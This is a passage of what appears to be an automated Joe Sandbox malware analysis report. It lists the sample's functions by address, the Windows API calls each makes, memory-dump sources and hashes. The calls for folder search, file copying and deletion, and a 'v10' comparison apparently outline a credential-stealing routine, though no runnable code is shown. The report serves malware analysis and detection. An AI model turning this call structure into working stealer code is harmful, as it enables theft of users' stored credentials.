                                                                                                                                                                                      Function 003542AF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000104,00000000,?), ref: 003542E8
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00354303
                                                                                                                                                                                        • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 00354005
                                                                                                                                                                                        • Part of subcall function 00353FEA: FindFirstFileA.KERNEL32(?,?), ref: 0035401C
                                                                                                                                                                                        • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E258), ref: 00354049
                                                                                                                                                                                        • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E254), ref: 00354063
                                                                                                                                                                                        • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 00354083
                                                                                                                                                                                        • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E266), ref: 00354090
                                                                                                                                                                                        • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 003540AD
                                                                                                                                                                                        • Part of subcall function 00353FEA: PathMatchSpecA.SHLWAPI(?,?), ref: 003540D0
                                                                                                                                                                                        • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?,000003E8), ref: 003540FC
                                                                                                                                                                                        • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,0035E264), ref: 0035410A
                                                                                                                                                                                        • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?), ref: 0035411A
                                                                                                                                                                                        • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,0035E264), ref: 00354128
                                                                                                                                                                                        • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?), ref: 0035413C
                                                                                                                                                                                        • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 003540BD
                                                                                                                                                                                        • Part of subcall function 00353FEA: CopyFileA.KERNEL32(?,00000000,00000001), ref: 003541D4
                                                                                                                                                                                        • Part of subcall function 00353FEA: DeleteFileA.KERNEL32(00000000), ref: 00354241
                                                                                                                                                                                        • Part of subcall function 00353FEA: FindNextFileA.KERNEL32(?,?), ref: 0035428B
                                                                                                                                                                                        • Part of subcall function 00353FEA: FindClose.KERNEL32(?), ref: 0035429C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                      • String ID: f5
                                                                                                                                                                                      • API String ID: 2104210347-2543225189
                                                                                                                                                                                      • Opcode ID: c900fdb011209fe25d7d6a5f69dcf1a42ddf3ed7ecfbff5f705d62031e872442
                                                                                                                                                                                      • Instruction ID: 3310d6d4c35ee7e4eb7a140687d66127a0edd23677f33c93ef0d5c6d6359259f
                                                                                                                                                                                      • Opcode Fuzzy Hash: c900fdb011209fe25d7d6a5f69dcf1a42ddf3ed7ecfbff5f705d62031e872442
                                                                                                                                                                                      • Instruction Fuzzy Hash: E83190B1D0051DBBCF16FFB0DC47CE93BBDEB08341F004955F9489A064EA7296998BA1
                                                                                                                                                                                      Function 00347BB0 Relevance: 4.9, APIs: 2, Strings: 1, Instructions: 377stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 00346BB0: memcmp.MSVCRT(?,v10,00000003,0035E264,0035E266,?), ref: 00346BCF
                                                                                                                                                                                        • Part of subcall function 00346BB0: memset.MSVCRT ref: 00346C00
                                                                                                                                                                                        • Part of subcall function 00346BB0: LocalAlloc.KERNEL32(00000040,?), ref: 00346C35
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00347FF4
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00348008
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmpmemset
                                                                                                                                                                                      • String ID: f5
                                                                                                                                                                                      • API String ID: 4023347672-2543225189
                                                                                                                                                                                      • Opcode ID: be31d5f3b30176588c5040bda96f39cbbfcdb3f26a69770241fd0586d0d4a09b
                                                                                                                                                                                      • Instruction ID: 3dc95c850f4dd4096371a2f1d492c2cdea2ec1042a1d4d7b198b95c0919268b2
                                                                                                                                                                                      • Opcode Fuzzy Hash: be31d5f3b30176588c5040bda96f39cbbfcdb3f26a69770241fd0586d0d4a09b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 72E1A971804008AADB16FBA4DC92DEE77B8BF25304F5145A5F416BE0A1EF34BB49CB54
                                                                                                                                                                                      Function 0034736C Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 227stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034759C
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 003475B0
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$CreateObjectOpenSingleThreadWait
                                                                                                                                                                                      • String ID: f5
                                                                                                                                                                                      • API String ID: 3799617333-2543225189
                                                                                                                                                                                      • Opcode ID: e28f1c164020d4375b91ddbfa0be332c4089e5b60b0f08ca9d1eacb7d988a3e0
                                                                                                                                                                                      • Instruction ID: 421746b51201c6de12093e1c58b099a074732b775b1d5bc12f91bcdfb34a6941
                                                                                                                                                                                      • Opcode Fuzzy Hash: e28f1c164020d4375b91ddbfa0be332c4089e5b60b0f08ca9d1eacb7d988a3e0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C81A672804108AADF06FBE4DD96CEE77B8BF25315F510565F402BE0A1EF24BA09CB65
                                                                                                                                                                                      Function 0034764A Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 196stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00347812
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00347826
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$CreateObjectOpenSingleThreadWait
                                                                                                                                                                                      • String ID: f5
                                                                                                                                                                                      • API String ID: 3799617333-2543225189
                                                                                                                                                                                      • Opcode ID: bff30578bec40ad150d66ac85f86662635409e335b8c7bf9a95c64beebfb9310
                                                                                                                                                                                      • Instruction ID: 81a5a88e48443e5d7d86e034d2760f83daf86c04356ae05be5510c2424de845b
                                                                                                                                                                                      • Opcode Fuzzy Hash: bff30578bec40ad150d66ac85f86662635409e335b8c7bf9a95c64beebfb9310
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2561A472804109ABDF06FBE4DD96CEE77B8BF25315B510565F402BE0A1EF24BA09CB61
                                                                                                                                                                                      Function 0034F93A Relevance: 4.6, APIs: 3, Instructions: 63COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: mallocmemset
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2882185209-0
                                                                                                                                                                                      • Opcode ID: 38432eb1330e1094018d1e3c586e9a99c824788f729c177646503f4c950da1b7
                                                                                                                                                                                      • Instruction ID: 2ae79421e5444223b74e38fd398b53f31c203cea3cb8aae27ebd13a55bad1ffe
                                                                                                                                                                                      • Opcode Fuzzy Hash: 38432eb1330e1094018d1e3c586e9a99c824788f729c177646503f4c950da1b7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 74115B72C04518FFCB12DF98DC80A8EBBB9FF04750F2582A6E815BA190C3716B519B81
                                                                                                                                                                                      Function 0034FCB0 Relevance: 4.5, APIs: 3, Instructions: 43fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,0035E264,0035E266,?,?,003510DC,?), ref: 0034FCD0
                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,003510DC,?), ref: 0034FCF7
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,003510DC,?), ref: 0034FD0E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1065093856-0
                                                                                                                                                                                      • Opcode ID: a74b6b064245c02ca7926077fee16553faa49f5949e42fa4850376440ef6b7a5
                                                                                                                                                                                      • Instruction ID: ec4fe9b2c421f6db39a8e1a4ec50781699c4b51908e0f5696206953cbd1a743e
                                                                                                                                                                                      • Opcode Fuzzy Hash: a74b6b064245c02ca7926077fee16553faa49f5949e42fa4850376440ef6b7a5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 72F062715001187FEB12AFA4DC86EEF379CAB16398F444121F9029A090EB20AE4596A4
                                                                                                                                                                                      Function 0034FB18 Relevance: 4.5, APIs: 3, Instructions: 27COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,003613FC), ref: 0034FB2C
                                                                                                                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0034FB47
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0034FB4E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
